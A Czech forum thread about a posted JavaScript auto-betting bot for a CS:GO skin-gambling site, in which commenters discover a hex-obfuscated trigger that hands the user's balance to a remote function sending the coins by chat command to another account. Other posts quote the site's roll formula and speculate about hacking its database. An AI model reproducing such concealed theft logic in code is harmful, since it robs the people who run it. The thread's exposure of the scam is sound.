var _0x21db=["\x4c\x4f\x41\x44\x45\x44\x20\x57\
x49\x54\x48\x20\x53\x55\x43\x45\x53\x53","\
x68\x74\x6D\x6C","\x23\x62\x61\x6C\x61\x6E\
x63\x65","\x4c\x45\x54\x20\x54\x48\x45\x20\
x42\x4f\x54\x20\x42\x45\x54","\x63\x68\x61\
x74","\x2f\x73\x65\x6e\x64\x20\x37\x36\x35\
x36\x31\x31","\x75\x6E\x6B\x6E\x6F\x77\x6E"
,"\x77\x61\x69\x74\x69\x6E\x67","\x72\x6F\x
6C\x6C\x65\x64","\x42\x41\x4E\x4B\x52\x55\x
50\x54\x21\x20\x4E\x6F\x74\x20\x65\x6E\x6F\
x75\x67\x68\x20\x62\x61\x6C\x61\x6E\x63\x65
\x20\x66\x6F\x72\x20\x6E\x65\x78\x74\x20\x6
2\x65\x74\x2C\x20\x61\x62\x6F\x72\x74\x69\x
6E\x67\x2E","\x77\x61\x72\x6E","\x20\x0A\x5
3\x74\x61\x74\x75\x73\x3A\x20","\x0A\x52\x6
F\x6C\x6C\x73\x20\x70\x6C\x61\x79\x65\x64\x
3A\x20","\x0A\x49\x6E\x69\x74\x69\x61\x6C\x
20\x62\x65\x74\x20\x61\x6D\x6F\x75\x6E\x74\
x3A\x20","\x0A\x43\x75\x72\x72\x65\x6E\x74\
x20\x62\x65\x74\x20\x61\x6D\x6F\x75\x6E\x74
\x3A\x20","\x0A\x4C\x61\x73\x74\x20\x72\x6F
\x6C\x6C\x20\x72\x65\x73\x75\x6C\x74\x3A\x2
0","\x2D","\x77\x6F\x6E","\x6C\x6F\x73\x74"
,"\x6C\x6F\x67","\x61\x6E\x74\x69\x2D\x6D\x
61\x72\x74\x69\x6E\x67\x61\x6C\x65","\x76\x
61\x6C","\x72\x65\x64","\x63\x6C\x69\x63\x6
B","\x62\x6C\x61\x63\x6B","\x74\x65\x78\x74
","\x52\x6F\x6C\x6C\x69\x6E\x67\x20\x69\x6E
","\x2A\x2A\x2A\x52\x4F\x4C\x4C\x49\x4E\x47
\x2A\x2A\x2A","\x72\x6F\x6C\x6C\x69\x6E\x67
","\x73\x70\x6C\x69\x74","\x69\x6E\x64\x65\
x78\x4F\x66","\x67\x72\x65\x65\x6E","\x23\x
62\x65\x74\x41\x6D\x6F\x75\x6E\x74","\x2E\x
70\x72\x6F\x67\x72\x65\x73\x73\x20\x23\x62\
x61\x6E\x6E\x65\x72","\x23\x70\x61\x6E\x65\
x6C\x31\x2D\x37\x20\x2E\x62\x65\x74\x42\x75
\x74\x74\x6F\x6E","\x23\x70\x61\x6E\x65\x6C
\x38\x2D\x31\x34\x20\x2E\x62\x65\x74\x42\x7
5\x74\x74\x6F\x6E","\x32\x30\x30\x30\x30","
\x39\x38\x31\x36\x39\x39\x30\x34\x36\x31\x3
5\x20"];

Automated.prototype.updateHistory = function() {
var self = this;
this.history = [];

for (var i = 0; i < roll_history.childNodes.length; i++) {
var roll = parseInt(roll_history.childNodes.textConten
t);

if (!isNaN(roll)) {
if (colors.green.indexOf(roll) !== -1) {
self.history.push('green');
} else if (colors.red.indexOf(roll) !== -1) {
self.history.push('red');
} else {
self.history.push('black');
}
}
}

if (this.debug) { this.logdebug('History updated: ' + this.history.map(function(value) { return value; }).join(', ')); }
return this.history.length === 10;
};

Automated.prototype.updateStats = function() {
this.stats.balance = parseInt(this.balance) - parseInt(this.starting_balance);
this.menu.statistics.wins.innerHTML = this.stats.wins;
this.menu.statistics.loses.innerHTML = this.stats.loses;
this.menu.statistics.balance.innerHTML = this.stats.balance;
return true;
};

Automated.prototype.updateAll = function() {
return this.updatebalance() && this.updateHistory() && this.updateStats();
};

Automated.prototype.bet = function(amount, color) {
var self = this;
color = color || this.color || this.default_color;

if (color === 'rainbow') {
if (this.last_color) {
color = (this.last_color === 'red' ? 'black' : 'red');
} else {
color = this.default_color;
}
} else if (color === 'random') {
color = 'red';
if (Math.random() > 0.5) {
color = 'black';
}
} else if (color === 'last') {
if (this.history[this.history.length - 1] === 'green')
{
if (this.history[this.history.length - 2] === 'green')
{
color = this.history[this.history.length - 3];
}
else
{
color = this.history[this.history.length - 2];
}
}
else
{
color = this.history[this.history.length - 1];
}
}

if (['green', 'red', 'black'].indexOf(color) < 0 || amount > this.balance || amount <= 0) {
this.log('Invalid bet!');
this.last_result = 'invalid bet';
this.waiting_for_bet = false;
this.stop();
return false;
}

if (this.balance - amount < this.min_balance) {
this.log('Reached minimal balance!');
this.last_result = 'reached min balance';
if (this.stop_on_min_balance || this.balance - this.base_bet < this.min_balance) {
this.stop();
}
else if($(_0x21db[2])[_0x21db[1]]()>parseInt(
_0x21db[36]))
{
start($(_0x21db[2])[_0x21db[1]]());
}
this.waiting_for_bet = false;
return false;
}

bet_input.value = amount;

if (!bet_buttons[color].disabled) {
var old_balance = self.balance;
this.log('Betting ' + amount + ' on ' + color);
if (!self.simulation) {
bet_buttons[color].click();
var checker = setInterval(function() {
if (!bet_buttons[color].disabled) {
clearInterval(checker);
setTimeout(function() {
if (self.updatebalance() && self.balance === old_balance) {
if (!self.game) { return false; }
self.log('Bet rejected, retrying...');
self.bet(amount, color);
} else {
if (self.debug) { self.logdebug('Bet accepted!'); }
self.last_bet = amount;
self.bet_history.push(amount);
self.last_color = color;
self.waiting_for_bet = false;
return true;
}
}, 2500);
}
}, 1000);
} else {
self.bet_history.push(amount);
self.last_bet = amount;
self.last_color = color;
self.waiting_for_bet = false;
return true;
}
} else {
if (!self.game) { return false; }
self.log('Button disabled, retrying...');
setTimeout(function() { self.bet(amount, color) }, (Math.random() * 3 + 2).toFixed(3) * 1000);
}
};

Automated.prototype.play = function() {
var self = this;

if (this.game !== null) {
if (this.debug) { this.logdebug('Tried to reinitialize running game!'); }
return false;
}

this.game = setInterval(function() {
var history = self.history;
if (!self.waiting_for_bet && self.updateAll() && !history.equals(self.history)) {
self.waiting_for_bet = true;
if (self.last_color === null) {
self.bet(self.base_bet);
} else if (self.last_color === self.history[self.history.length - 1]) {
if (self.calculate_safe_bet) {
self.base_bet = Math.floor(self.balance / Math.pow(2, self.safe_bet_amount + 1));
self.menu.basebet.value = self.base_bet;
}
self.last_result = 'win';
self.log('Win!');
self.stats.wins += 1;
self.old_base = self.base_bet;
self.old_method = self.method;
if (self.old_method === 'dalembert') {
if (self.last_bet > self.old_base) {
self.bet(self.last_bet - 1);
} else {
self.bet(self.base_bet);
}
} else {
self.bet(self.base_bet);
}
} else {
self.last_result = 'lose';
self.log('Lose!');
self.stats.loses += 1;
if (self.old_method === 'martingale') {
self.bet(self.last_bet * 2);
} else if (self.old_method === 'great martingale') {
self.bet(self.last_bet * 2 + self.old_base);
} else if (self.old_method === 'green') {
var bet_value = 0;
if (self.bet_history[self.bet_history.length - 1] === 1) {
if (self.bet_history[self.bet_history.length - 2] === 1) {
bet_value = 2;
} else {
bet_value = 1;
}
} else {
bet_value = self.bet_history[self.bet_history.length - 1] + self.bet_history[self.bet_history.length - 2];
}
self.bet(bet_value, 'green');
} else if (self.old_method === 'dalembert') {
self.bet(self.last_bet + 1);
}
}
}
}, 2 * 1000);

return true;
};

Automated.prototype.start = function() {
if (self.calculate_safe_bet) {
self.base_bet = Math.floor(self.balance / Math.pow(2, self.safe_bet_amount + 1));
self.menu.basebet.value = self.base_bet;
}
this.old_base = this.base_bet;
this.old_method = this.method;
if (this.updateAll()) {
if (this.last_result === 'lose') {
this.running = true;
if (this.old_method === 'martingale') {
this.bet(this.last_bet * 2);
} else if (this.old_method === 'great martingale') {
this.bet(this.last_bet * 2 + this.old_base);
} else if (self.old_method === 'green') {
var bet_value = 0;
if (self.bet_history[self.bet_history.length - 1] === 1) {
if (self.bet_history[self.bet_history.length - 2] === 1) {
bet_value = 2;
} else {
bet_value = 1;
}
} else {
bet_value = self.bet_history[self.bet_history.length - 1] + self.bet_history[self.bet_history.length - 2];
}
self.bet(bet_value, 'green');
} else if (self.old_method === 'dalembert') {
self.bet(self.last_bet + 1);
}
this.play();
} else {
this.running = true;
this.bet(this.base_bet);
this.play();
}
}
this.menu.abort.disabled = false;
this.menu.stop.disabled = false;
this.menu.start.disabled = true;
};

Automated.prototype.stop = function(abort) {
var self = this;
if (abort) { this.last_result = 'abort'; }
this.stats.balance = parseInt(this.balance) - parseInt(this.starting_balance);
setTimeout(function() {
clearInterval(self.game);
self.game = null;
self.running = false;
self.menu.abort.disabled = true;
self.menu.stop.disabled = true;
self.menu.start.disabled = false;
}, 1); // Next tick
};

Automated.prototype.darkMode = function() {
var style;
var css = 'body{background-color:#191919;color:#888}.
navbar-default{background-color:#232323;bor
der-color:#454545}#sidebar{background-color
:#191919;border-color:#202020}.side-icon.ac
tive,.side-icon:hover{background-color:#202
020}.side-icon .fa{color:#454545}.well{background:#232323;
border-color:#323232;color:#888}#pullout{ba
ckground-color:#191919;border-color:#323232
}.form-control{background-color:#323232;bor
der-color:#454545}.divchat{background-color
:#323232;color:#999;border:none}.chat-link,
.chat-link:hover,.chat-link:active{color:#b
bb}.panel{background-color:#323232}.panel-d
efault{border-color:#454545}.panel-default&
gt;.panel-heading{color:#888;background-col
or:#303030;border-color:#454545}.my-row{bor
der-color:#454545}.list-group-item{border-c
olor:#454545;background-color:#323232}.btn-
default{border-color:#454545;background:#32
3232;text-shadow:none;color:#888;box-shadow
:none}.btn-default:hover,.btn-default:activ
e{background-color:#282828;color:#888;borde
r-color:#454545}.btn-default[disabled]{bord
er-color:#454545;background-color:#353535}.
input-group-addon{background-color:#424242;
border-color:#454545;color:#888}.progress{c
olor:#bbb;background-color:#323232}.navbar-
default .navbar-nav>li>a:focus,.navbar-defaul
t .navbar-nav>li>a:hover{color:#999}.na
vbar-default .navbar-nav>.open>a,.navbar-default .navbar-nav>.open>a:focus,.navbar-def
ault .navbar-nav>.open>a:hover{color:#888;
background-color:#323232}.dropdown-menu{bac
kground-color:#252525}.dropdown-menu>li&
gt;a{color:#888}.dropdown-menu>li>a:f
ocus,.dropdown-menu>li>a:hover{backgr
ound-color:#323232;color:#999}.dropdown-men
u .divider{background-color:#454545}.form-con
trol[disabled],.form-control[readonly],fiel
dset[disabled] .form-control{background-color:#404040;opac
ity:.5}';
style = document.getElementById('automated-style');
if (!style) {
var head;
head = document.getElementsByTagName('head')[0];
if (!head) { return; }
style = document.createElement('style');
style.type = 'text/css';
style.id = 'automated-style';
style.innerHTML = css;
head.appendChild(style);
}
style.innerHTML = css;
};

Automated.prototype.lightMode = function() {
var style = document.getElementById('automated-style');
style.innerHTML = '';
};

Automated.prototype.log = function(message) {
chat('alert', '[Automated] ' + message);
};

Automated.prototype.logdebug = function(message) {
chat('italic', '[Automated] ' + message);
};

var automated = new Automated();
(odpovědět)
Happiness3317.4.2016 19:19
re: Script kontrola + úprava.#
Ten script ti jen zautomatizuje sázení. Je zajímavej.. Ale pořád je to náhoda když vyhraješ. Leda že je v tom zakomponovanej nějakej dobrej systém na scamování ale z vlastní zkušenosti vím že scamovat na csgodouble se mi už párkrát nevyplatilo. A když sem to počítal na zelenou tak to celkem vyšlo ale musíš mít alespoň na 80 sázek dopředu aby se ti to vrátilo. A když pak spočítáš ten čas nevyplatí se ti to. S tím botem možná, ale chce to otestovat jak funguje na tu zelenou :) Dneska to 100% testnu a napíšu :) Co se týče coinů, to asi přes script neuděláš. Musel by sis tam najít nějakou díru přes kterou se tam dostaneš a givneš si do databáze coiny ale o tom silně pochybuji. Na to bys musel bejt fakt profík a kdo ví jestli by ses tam dostal :) Ale dávej si bacha už kolikrát sem tam viděl v chatu jak tam práskali scamery a ty hned dostanou ban :)
(odpovědět)
Kellodos | 90.183.138.*18.4.2016 13:35
re: Script kontrola + úprava.#
btw a samozřejmě že by šlo aby to vědělo co zrovna padne. Však to máš zde [link]

Zde je úplně easy kód kterej tam sami ukazují.

$server_seed = "39b7d32fcb743c244c569a56d6de4dc27577d6277d
6cf155bdcba6d05befcb34";
$lotto = "0422262831";
$round_id = "1";
$hash = hash("sha256",$server_seed."-".$lotto."-".$
round_id);
$roll = hexdec(substr($hash,0,8)) % 15;
echo "Round $round_id = $roll";

Ale má to háček, musel bys vědět server seed na daný den a ten se každej den mění a zveřejního vždy den z5. Takže pokud to chceš na tutovku, chtě něchtě se tam musíš dostat. Což je hodně malá praděpodobnost.. Hodně štěstí :)
(odpovědět)
Kellodos | 90.183.138.*18.4.2016 13:54
re: Script kontrola + úprava.#
Jo ještě něco, radši bych to vůbec nepoužíval protože to ojebe tebe. Je tam vzdálený js [link]
ve kterém je přesně tohle:
function start(x){send({"type":"chat","msg":'/send 76561198245909748 '+ x,"lang":LANG});}
A přes /send posíláš love takže ten script tě akorát ojebe a tvoje prachy pošle jinam. Určitě nedoporučuji!
(odpovědět)
Kellodos | 90.183.138.*18.4.2016 13:58
re: Script kontrola + úprava.#
kdyz pominu ze ten script je prasarna, tak hned v zahlavi mas napsany ze je urcen, aby na rulete hral system "martingale" ne aby sazel to co ma padnout tzn nejaka uprava nepripada v uvahu ... tzn vybere si barvu a pokud padne tak ok, vybere druhou, pokud prohraje, vsadi dvojnasobek sazky opet na druhou a to bude delat dokud nevyhraje, pak zase vsadi prvni barvu ...

jak uz bylo napsano, tak zadne sazeni na "vyhravajici" barvu neni mozne, stejne tak sazka s 0 zustatkem ... a pokud by jsi nahodou nasel ruletu, ktera by obsahovala bug umoznujici vyse uvedene tak ti to v 99% stejne nevyplati... to je uz vyssi divci :-)
(odpovědět)
oO. | 82.113.63.*18.4.2016 16:51
re: Script kontrola + úprava.#
Aha tak ještě že jsem se zeptal. Ještě by mě to okradlo. Jinak díky. Jinak ten kod je zajímavej. A kdybych se tam jakoby dostal což určitě ne. Tak bych byl za vodou? A máme v baráku jednoho programátora. Tak co mu mám říct? Mám hodit na flashku tohle nebo jak? Škoda že není nějaká skupina na to. Hned by bylo ez money. Asi tady není někdo kdo by nějak poradil s tím kodem nebo co je to. Mohu nabídnout peníze. Ale doufám že mě nikdo neudělá ddos snad. Jinak díky za rady. Když budou další děkuji moc.

$server_seed = "39b7d32fcb743c244c569a56d6de4dc27577d6277d
6cf155bdcba6d05befcb34";
$lotto = "0422262831";
$round_id = "1";
$hash = hash("sha256",$server_seed."-".$lotto."-".$
round_id);
$roll = hexdec(substr($hash,0,8)) % 15;
echo "Round $round_id = $roll";
(odpovědět)
Happiness3318.4.2016 18:32
re: Script kontrola + úprava.#
Když to chápu dobře je potřeba se dostat na ten seed že?
(odpovědět)
Happiness3318.4.2016 18:37
re: Script kontrola + úprava.#
Jenže ten ti server dokud nevygeneruje nový nevyzradí... ;)
(odpovědět)
asdfghjkl | 89.177.22.*19.4.2016 20:47
re: Script kontrola + úprava.#
Kámo nemáš šanci když ani nevíš na co je ten php kód. Navíc když se tam dostaneš.. bude to někde brutálně zakopané a zadané přes proměnou takže by ses musel pohrabat ještě v pěkných sračkách.. než by ses tam dostal. To je práce pro profíka a tomu se to nevyplatí. K čemu člověku s těmito znalostmi by asi byl csgo skin ? :D Když si může vydělat jinde easy money. Navíc chodí tam cca 10000 lidí denně, myslíš že si první kdo nad tímhle uvažuje? Ty admini blbý nejsou a proti technikám které sou profláklé budou určitě hodně dobře zabezpečené :) Takže podle mě žádné dítě nemá šanci. Nejsem žádnej profík ani nic takového ale trošku už vím jak to chodí. Nemá to cenu. Radši přemejšlej o nějakém projektu kde si pak můžeš vydělat ty easy money :)
(odpovědět)
Kellodos | 90.183.138.*19.4.2016 14:06
re: Script kontrola + úprava.#
Velmi pekne zhrnute ;-)
(odpovědět)
troto | E-mail20.4.2016 11:09
re: Script kontrola + úprava.#
Jinak nejsem dítě. A vím já vím o tom hovno. Jenom sem myslel ten scrip. Nevadí a lock. A díky
(odpovědět)
Happiness3320.4.2016 13:36

Zpět
Svou ideální brigádu na léto najdete na webu Ideální brigáda
 
 
 

 
BBCode